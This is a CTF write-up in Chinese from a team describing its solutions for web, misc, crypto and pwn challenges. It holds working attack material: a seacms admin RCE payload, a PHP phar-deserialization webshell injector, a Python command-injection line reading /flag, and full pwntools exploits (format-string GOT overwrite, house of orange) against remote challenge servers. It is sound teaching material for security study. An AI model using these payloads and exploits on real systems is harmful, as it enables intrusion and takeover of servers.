纵横杯(安全客转载)
tags: writeup

纵横杯 By 天璇Merak

[toc]

Web

大家一起来审代码

seacms
后台 admin admin弱密码登录
github搜 cve
后台getshell
https://github.com/ciweiin/seacms/issues/10

Vulnerability Name: rce
Vulnerability path: upload/admin/Admin_ ping.php
payload: ";phpinfo();/*

1.Open upload / admin / admin_ ping.php
We can see that the parameters of weburl and token are accepted in lines 7-8, and without any filtering, they are directly written in.. / data / admin in lines 10-18/ ping.php Under the path
image

Start to reappear
image

Click system, then click Baidu push setting
image

Then enter the attack statement in the text box
payload: ";phpinfo();/*

image

Then you see phpinfo executed
image

easyci

直接sqlmap一把梭得到admin密码:HEIEHIEHIHEI
进入发现啥也没有,但是是root@localhost,想到上传文件getshell
需要知道网站根目录

/etc/apache2/sites-available/000-default.conf


知道绝对路径后,直接上传文件拿到flag

ezcms

发现www.zip源码泄露,并且下载官方源码,进行对比发现:


应该是此处存在漏洞,可以利用进行任意文件读取,该类对应后台的收集路由
config.php

判断可能后台密码和数据库密码相同,进入后台后,上传文章

<ss123>
    <a href="httpxxx://../../../../../../../flag">123</a>
</ss123>

hello_php

<?php
class Config{
    public $title;
    public $comment;
    public $logo_url;
    public function __construct()
    {
        $this->title = '\';eval($_POST[1]);?>';
        $this->comment = '\';eval($_POST[1]);?>';
    }
    public function __destruct(){
        $file = file_get_contents(pathinfo($_SERVER['SCRIPT_FILENAME'])['dirname'].'/config.php');
        $file = preg_replace('/\$title=\'.*?\';/', "\$title='$this->title';", $file);
        $file = preg_replace('/\$comment=\'.*?\';/', "\$commnet='$this->comment';", $file);
        file_put_contents(pathinfo($_SERVER['SCRIPT_FILENAME'])['dirname'].'/config.php', $file);
    }
}

$exception = new Config();

$phar = new Phar("vul.phar");

$phar->startBuffering();

$phar->addFromString("test.txt", "test");

$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');

$phar->setMetadata($exception);

$phar->stopBuffering();

?>

需要知道上传的时间,可以先得到时间再上传,在计算时间延后1-2s的md5值即可:

收集该文章:


采集得到flag

Misc

签到

直接输出

maze1

直接硬跑就出
(remote地址是外网服务器转发的地址+端口)
(咱们的网段被ban了!!!震声)

from pwn import *
from queue import Queue

p = remote("121.4.103.225", 11001)

p.recv()
p.sendline("")

dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
ans = ['s', 'd', 'w', 'a']
cnt = 0
while True:
    try:
        maze = p.recvuntil("\n>", drop = True)
    except:
        break

    height = maze.count('\n')
    width = len(maze.split('\n')[0])
    maze = maze.replace('\n', '')
    q = Queue()

    now = maze.find('*')
    q.put((now, ""))
    accessable = []

    way = ""

    while not q.empty():
        this = q.get()
        position = this[0]
        if maze[position] == '$':
            way = this[1]
            break
        accessable.append(position)
        for i in range(4):
            if maze[position + dy[i] * width + dx[i]] != '#' and position + dy[i] * width + dx[i] not in accessable:
                q.put((position + dy[i] * width + dx[i], this[1] + ans[i]))

    p.recv()
    p.sendline(way)

    print("finished! %d" % cnt)
    print(way)
    cnt += 1

p.interactive()

问卷

good_game

My_secret

给了png和密码就直接往lsb考虑 一看就都是脚本题目
直接带密钥得lsb一把梭
得到第二串密钥
38d668578a3686ab
一看jpg后面有一些奇怪的东西
感觉是某种加密应该解密就是flag
所以这串密钥应该是解决 wav难题的。
wav 只见过silent eye 和 在新疆杯上见过的deepsound2john
silenteye无果,这个就试deepsound
直接出了下一个密钥 carrier
继续解密
secret.jpg
又是工具,stegdetect啥也没有steghide也啥也没有水印也啥也没有
还是找工具 直接找xstegsecret 也没有
最后找oursecret 彳亍
拿到flag
flag{5ba4f1e5-0108-4ffe-8dba-7acdd528af33}

马赛克

前几天才有的工具
紧随潮流
depix一把梭


老人工智能了
看就恩看
0123468abd68abd0123

maze2

非预期input()命令执行

__import__('os').system('cat /flag')

Cry

common

De1CTF ez RSA原题,一样的格子,遍历得到d1,d2即可

from Crypto_tools import *
from sage.all import *
from sage.all_cmdline import *

e1 = 28720970875923431651096339432854172528258265954461865674640550905460254396153781189674547341687577425387833579798322688436040388359600753225864838008717449960738481507237546818409576080342018413998438508242156786918906491731633276138883100372823397583184685654971806498370497526719232024164841910708290088581
e2 = 131021266002802786854388653080729140273443902141665778170604465113620346076511262124829371838724811039714548987535108721308165699613894661841484523537507024099679248417817366537529114819815251239300463529072042548335699747397368129995809673969216724195536938971493436488732311727298655252602350061303755611563
N = 159077408219654697980513139040067154659570696914750036579069691821723381989448459903137588324720148582015228465959976312274055844998506120677137485805781117564072817251103154968492955749973403646311198170703330345340987100788144707482536112028286039187104750378366564167383729662815980782817121382587188922253
c1 = 125774545911886560112703402972153322080506025378797523936708278181480201146872577291738201370911792392950418121767343486509724963000477466590009600240375221563806039364611362947152096656513910712238094956240996452246301471555709823003175801134035094856941903678067489942047840663479442285170087613352040341832
c2 = 125874844114757588984441500491946737723620819049276461078841545869549114013042058416210220287667061892072831243333341942699313440553285306436999725802970995457080384300690875762412008576026273931144721166609563493297003298586115510199518494430188305644317422640652955882264990001338974742192006748451975507803

E = [e1, e2]

for i in range(2048//3,  2048//3 + 50):
    x = Integer(i) / Integer(2048)
    print(i)
    N_1 = round(N**(Integer(1)/Integer(2)))
    N_2 = round(N**(1+x))

    N_3 = round(N**(Integer(i) / Integer(100)))
    A = Matrix(ZZ, [[N,   -N_1 * N,   0,            N**2],
                    [0,   N_1 * e2,  -N_2 * e2,     -e2*N],
                    [0,    0,         N_2 * e1,     -e1*N],
                    [0,    0,         0,            e1*e2]])

    AL = A.LLL()
    C = Matrix(ZZ, AL[0])
    B = A.solve_left(C)[0]

    phi_base = floor(e2 * (B[1] // B[0]))
    for j in range(-1, 2):
        phi = phi_base + j
        for e in E:
            d = inverse(e, phi)
            m = long_to_bytes(pow(c1, d, N))
            if all_ascii(m):
                print(m)
            m = long_to_bytes(pow(c2, d, N))
            if all_ascii(m):
                print(m)
                sys.exit(1)

babyLWE

祥云杯的板子(https://www.anquanke.com/post/id/223383#h3-25)跑一下就出了

from sage.modules.free_module_integer import IntegerLattice

def BabaisClosestPlaneAlgorithm(L, w):
    '''
    Yet another method to solve apprCVP, using a given good basis.
    INPUT:
    * "L" -- a matrix representing the LLL-reduced basis (v1, ..., vn) of a lattice.
    * "w" -- a target vector to approach to.
    OUTPUT:
    * "v" -- a approximate closest vector.
    Quoted from "An Introduction to Mathematical Cryptography":
    In both theory and practice, Babai's closest plane algorithm
    seems to yield better results than Babai's closest vertex algorithm.
    '''
    G, _ = L.gram_schmidt()
    t = w
    i = L.nrows() - 1
    while i >= 0:
        w -= round( (w*G[i]) / G[i].norm()^2 ) * L[i]
        i -= 1
    return t - w

def fxxk_ggh():
    module = 8934325385505568130914092337950620590424921674062792756625169144539462888362199042365894202712873706261308891694743761726859424971637596576879385466842113

    row = 64
    column = 32
    Lattice = Matrix(ZZ, row + column, row)

    for i in range(row):
        for j in range(column):
            Lattice[row + j, i] = matrix[i][j]
        Lattice[i, i] = module

    lattice = IntegerLattice(Lattice, lll_reduce=True)
    target = vector(ZZ, result[:row])
    cvp = BabaisClosestPlaneAlgorithm(lattice.reduced_basis, target)
    #R = IntegerModRing(module)
    FLAG = Matrix(Zmod(module), matrix[:row])
    flag = FLAG \ cvp
    print(''.join( chr(i) for i in flag))

result = []
for each in L:
    result.append(each[1])
matrix = []
for each in L:
    matrix.append(list(each[0]))
q = 8934325385505568130914092337950620590424921674062792756625169144539462888362199042365894202712873706261308891694743761726859424971637596576879385466842113

fxxk_ggh()

digits_missing

基操解出来b和c,然后利用c2和b,dlp求出e1+e2
最后利用c3,爆破得到a
然后利用coppersmith's attak ,已知m高位,求整个m,

from gmpy2 import *
from Crypto.Util.number import *
from random import getrandbits
import uuid
import time 
def rsa_dpdq(c,p,q,dp,dq):      #reveal dp&dq
    mp = pow(c,dp,p)
    mq = pow(c,dq,q)
    InvP=invert(p,q)
    InvQ=invert(q,p)
    try:
        m = (mp*p*InvP+mq*q*InvQ)%(p*q)
        return long_to_bytes(m)
    except:
        m2 = (((mp-mq)*InvQ)%p)*q+mq
        return long_to_bytes(m)

p, q, dp, dq, c1, c2, c3, c4=(9012177021932598731093097295248262551038647871172870414413032721858840633696698394506882692631276185231263668884098549390672903944012264131514913768102059, 13276428714493736525706972677766602646645198691674173239894688253198622492725429908291793598800440764746269328508467887923823901685795979465722976346922237, mpz(5930408515539601788951406582226981304578877157150457481768753879415433970957390721431031094532702280416640150245872132615421448633185480701871318895278989), mpz(11972181604197594098197709335060769256914063243271406338382796310027746876015678065849353020977194946821112122999623321373751271647095270275468582844123305), 57966359653034749624717052054886720604669397091956284485562330399309204365806164288874912956848166812573650240081262103554088454351078413904276590342808692268778913241694104922129212369889196568906576892924299521579873170934978926990069128954734188676355986565341173608480157492202372752135725156732438088451, 17447577574312613971450175033090544662604439837846591003262445289625314618867658318140901637203381694849451781593442921818926848261102816223339105960883880936085963968342669100290600300323911100802270364148539120737506206780930952620065175004528452087187134069806801029320727937046590254358062277589234558585, 66943876461951525707840551169609495355169491283660692485196611494799382570985756750860577906280538249497413155123044056244078935556257084118805468152775945759458619542048600342247793351383176258097725847066751405789329001076391433457940674605431362380193799429739629994616293306430787262244264200037659990855, 85675597623903160934355902355733447146886961162275348810277114534245305237441737270799547956164644091603077334678838275191826212916420001154430650989096444413373249883074046051633410316945100529471611200994087765054410035372436020860179978702092108306638848679132761052862447964856819933313063341755241056395)
nn=66442292138939994008585245717226499074430780356754301428786129627761199772080656972422189200687286655989342990033892222751162330429917160211076751202919221105000510408340684982768002644852287260860136071476247209262934997138516620028486517153019554511944103340884841254678682058936833441307291121560050184387
c=62660062196860780748321891664224323210733407658954868754136813454276197326286989854755063135388270492115677534757771740441654605013455630509082901831383997174837303122307903048769036933981340466294080355175644010962515708905474510644455088727239628649170131534290730571906687613233026401827836518586465485444
phi = (p-1)*(q-1)
d = inverse(65537,phi)
c = long_to_bytes(pow(c4,d,p*q))
flag_c = pow(c4,d,p*q)
b = rsa_dpdq(c1,p,q,dp,dq)

b = bytes_to_long(b)
flag_b = b
m1, m2 = b >> 256, b & 2 ** 256 - 1
mm = m1 + m2
print(mm)
print("")
print(q)

q = 13276428714493736525706972677766602646645198691674173239894688253198622492725429908291793598800440764746269328508467887923823901685795979465722976346922237

_q = 1807898026514198552161521755388692519550593191654928881367116633412247407510859936440485152109654028947281282838938910224883050168532843*777241*3*4
c = 17447577574312613971450175033090544662604439837846591003262445289625314618867658318140901637203381694849451781593442921818926848261102816223339105960883880936085963968342669100290600300323911100802270364148539120737506206780930952620065175004528452087187134069806801029320727937046590254358062277589234558585

cc = pow(c,_q,q)

m = 23691518323426457658635085562847800103472768631721540345337353927596161970597
mm = pow(m,_q,q)

#dlp 求e1+e2
#m = Mod(mm,q)
#c = Mod(cc,q)
#discrete_log(c,m)

#assert pow(m1 + m2,e1_e2,p*q)==c2

#var('x')

c3 = 66943876461951525707840551169609495355169491283660692485196611494799382570985756750860577906280538249497413155123044056244078935556257084118805468152775945759458619542048600342247793351383176258097725847066751405789329001076391433457940674605431362380193799429739629994616293306430787262244264200037659990855

e1_e2=1818610372

#mod = 119649525794086602537989574541241419796799436460454220755415501528996044207202659693031588834128799210243846006696362286233559955444645444962714577683770444593230371683999071742375716553356183063552347435698371156406100088045998453289093698593965307719228634481684435519601355578327980224641872499649552585983

#solve_mod([(x*(2^32)+(e1_e2-x))^(x*(2^32)+(e1_e2-x)) == c3],mod)
n=p*q
table = '0123456789abcdef'
temp = ""
'''
for i in table:
    for j in table:
        for k in table:
            for l in table:
                tmp = i+j+k+l
                tmp = bytes_to_long(tmp)
                tmp2 = e1_e2-tmp
                a = (tmp<<32)+tmp2
                #print(a)
                if pow(a,a,n) == c3:
                    print(a)
                a = (tmp2<<32)+tmp
                if pow(a,a,n) == c3:
                    print(a)
'''
flag_a = 3762025631478473827

nn=66442292138939994008585245717226499074430780356754301428786129627761199772080656972422189200687286655989342990033892222751162330429917160211076751202919221105000510408340684982768002644852287260860136071476247209262934997138516620028486517153019554511944103340884841254678682058936833441307291121560050184387
c=62660062196860780748321891664224323210733407658954868754136813454276197326286989854755063135388270492115677534757771740441654605013455630509082901831383997174837303122307903048769036933981340466294080355175644010962515708905474510644455088727239628649170131534290730571906687613233026401827836518586465485444

m = bytes_to_long(long_to_bytes(flag_a) + long_to_bytes(flag_b) + long_to_bytes(flag_c))
'''
#sage
c=62660062196860780748321891664224323210733407658954868754136813454276197326286989854755063135388270492115677534757771740441654605013455630509082901831383997174837303122307903048769036933981340466294080355175644010962515708905474510644455088727239628649170131534290730571906687613233026401827836518586465485444

nn=66442292138939994008585245717226499074430780356754301428786129627761199772080656972422189200687286655989342990033892222751162330429917160211076751202919221105000510408340684982768002644852287260860136071476247209262934997138516620028486517153019554511944103340884841254678682058936833441307291121560050184387

m=930463309785680538015584437510307325649656854353255828146436212558343466451584971057735386588017651262290109823729492005958573543316448001003343467708576279015129647658405359649537202138408242

kbits = 128

m = m<<kbits

N = nn
e = 5
c = c

ZmodN = Zmod(N)
P.<x> = PolynomialRing(ZmodN)
f = (m + x)^e - c
x0 = f.small_roots(X=2^128,epsilon=0.09)[0]
print(long_to_bytes(m + x0))
'''

Pwn

shell

格式化字符串漏洞改got表为one_gadget

#!/usr/bin/python
from pwn import *
context(log_level='debug',arch='amd64')

local=0
binary_name='pwn'
if local:
    p=process("./"+binary_name)
    e=ELF("./"+binary_name)
    libc=e.libc
else:
    p=remote('121.4.103.225',35264)
    e=ELF("./"+binary_name)
    libc=ELF("libc-2.23.so")

def z(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            raw_input
    else:
        pass
ru=lambda x:p.recvuntil(x)
rc=lambda x:p.recv(x)
sl=lambda x:p.sendline(x)
sd=lambda x:p.send(x)
sla=lambda a,b:p.sendlineafter(a,b)
ia=lambda : p.interactive()

def fmt(data,addr,off):
    arg0=(data)&0xff
    arg1=(data&0xff00)>>8
    arg2=(data&0xff0000)>>16
    arg3=(data&0xff000000)>>24
    arg4=(data&0xff00000000)>>32
    arg5=(data&0xff0000000000)>>40
    # print arg0,arg1,arg2,arg3
    # arg6=(data&0xf f000000000000)>>48
    # arg7=(data&0xf f00000000000000)>>56
    pay1='%'+str(arg0-5)+'c%'+str(off+10)+'$hhn'
    pay2='%'+str( (arg1-arg0+0x100)%0x100)+'c%'+str(off+11)+'$hhn'
    pay3='%'+str( (arg2-arg1+0x100)%0x100)+'c%'+str(off+12)+'$hhn'
    pay4='%'+str( (arg3-arg2+0x100)%0x100)+'c%'+str(off+13)+'$hhn'
    pay5='%'+str( (arg4-arg3+0x100)%0x100)+'c%'+str(off+14)+'$hhn'
    pay6='%'+str( (arg5-arg4+0x100)%0x100)+'c%'+str(off+15)+'$hhn'
    payload = pay1+pay2+pay3+pay4+pay5+pay6 # +'%100000c'
    payload = payload.ljust(8*10,'A')
    payload = payload.encode('latin1')
    payload+= p64(addr)
    payload+= p64(addr+1)
    payload+= p64(addr+2)
    payload+= p64(addr+3)
    payload+= p64(addr+4)
    payload+= p64(addr+5)
    return payload

def a(payload):
    sl('bg %1'+payload)
    sleep(0.5)

payload='%p,%11$p,%163$p'
a(payload)
p.recv(2)
b = p.recvline()
text_base=int(b[3:17],16)-0x153b
print(hex(text_base))
libc_base=int(b[18:32],16)-0x6db8d
print(hex(libc_base))

system = libc_base+libc.sym['system']
onegadget=[0x45226,0x4527a,0xf0364,0xf1207]
oneshoot=libc_base+onegadget[0]
printf_got=text_base+0x203068

fmt=fmt(oneshoot,printf_got,173)
payload=b'bbb'+fmt
a(payload.decode('latin1'))
#z()

ia()

wind_farm_panel

house of orange,套板出

from pwn import *
context(log_level='debug',arch='amd64')

local=0
binary_name='pwn'
if local:
    p=process("./"+binary_name)
    e=ELF("./"+binary_name)
    libc=e.libc
else:
    p=remote('182.92.203.154',28452)
    e=ELF("./"+binary_name)
    libc=ELF("libc-2.23.so")

def z(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            raw_input
    else:
        pass
ru=lambda x:p.recvuntil(x)
rc=lambda x:p.recv(x)
sl=lambda x:p.sendline(x)
sd=lambda x:p.send(x)
sla=lambda a,b:p.sendlineafter(a,b)
ia=lambda : p.interactive()

def add(idx,size,content):
    ru(">> ")
    sl("1")
    ru("Please enter the wind turbine to be turned on(0 ~ 5): ")
    sl(str(idx))
    ru("Please input the maximum power of this wind turbine: ")
    sl(str(size))
    ru("Please write down the name of the person who opened it\nYour name: ")
    sd(content)

def show(idx):
    ru(">> ")
    sl("2")
    ru("Please select the number of the wind turbine to be viewed: ")
    sl(str(idx))

def edit(idx,content):
    ru(">> ")
    sl("3")
    ru("Please modify your personal information.\nWhich turbine: ")
    sl(str(idx))
    ru("Please input: ")
    sd(content)

add(0,0x80,'a')
payload='a'*0x88+p64(0xf71)
edit(0,payload)
add(1,0x1000,'a')
add(2,0x400,'a')
show(2)
libcbase=u64(ru('\x7f')[-6:].ljust(8,'\x00'))-1601-0x3c4b20
print ("libcbase:"+hex(libcbase))

edit(2,'a'*16)
#z()
show(2)
#rc(0x35)
#heapbase=u64(rc(6).ljust(8,'\x00'))-0x90
heapbase=u64(ru('\x55')[-6:].ljust(8,'\x00'))-0x90
print ("heapbase:"+hex(heapbase))
_IO_list_all=libcbase+libc.sym['_IO_list_all']
system=libcbase+libc.sym['system']
print ("IO list:"+hex(_IO_list_all))

payload='a'*0x400
fake_file='/bin/sh\x00'+p64(0x60)
fake_file+=p64(0)+p64(_IO_list_all-0x10)#unsorted bin attack
fake_file+=p64(0)+p64(1)#IO_write_ptr>IO_write_base
fake_file=fake_file.ljust(0xc0,'\x00')#_mode=0
payload+=fake_file
payload+=p64(0)*3+p64(heapbase+0x4a0+0xd8)
payload+=p64(0)*2+p64(system)
z()
edit(2,payload)

ru(">> ")
sl('1')
ru("Please enter the wind turbine to be turned on(0 ~ 5): ")
sl('0')
ru("Please input the maximum power of this wind turbine: ")
sl('128')

ia()
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇